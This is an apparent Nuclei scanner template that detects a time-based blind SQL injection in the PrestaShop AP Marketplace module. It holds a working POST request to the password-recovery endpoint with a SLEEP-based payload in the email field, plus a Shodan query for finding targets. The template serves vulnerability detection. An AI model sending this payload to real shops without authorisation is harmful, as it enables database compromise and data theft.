id: prestashop-apmarketplace-sqli

info:
  name: PrestaShop Ap Marketplace SQL Injection
  author: mastercho
  severity: high
  description: |
    The AP Marketplace Prestashop module is vulnerable to Blind/Time SQL Injection. An attacker can exploit this vulnerability to execute arbitrary SQL queries on the underlying database.
  reference:
    - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/#pll_switcher
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Prestashop"
  tags: prestashop,sqli

http:
  - raw:
      - |
        POST /m/apmarketplace/passwordrecovery HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}
        X-Requested-With: XMLHttpRequest

        email=" AND (SELECT 3472 FROM (SELECT(SLEEP(6)))UTQK)-- IGIe&submit_reset_pwd=

    matchers:
      - type: dsl
        dsl:
          - 'duration_2>=6'
          - 'contains(body, "module-apmarketplace-passwordrecovery")'
        condition: and

# digest: 4b0a00483046022100b48440bd6c3340453db529a4aa26ebfc2720ca154ed673b86253139e316d9fa3022100c353a472d66ba11b085155b28ee58f92dce4988e04ba847f68aefa70fd759a4d:922c64590222798bb761d5b6d8e72950
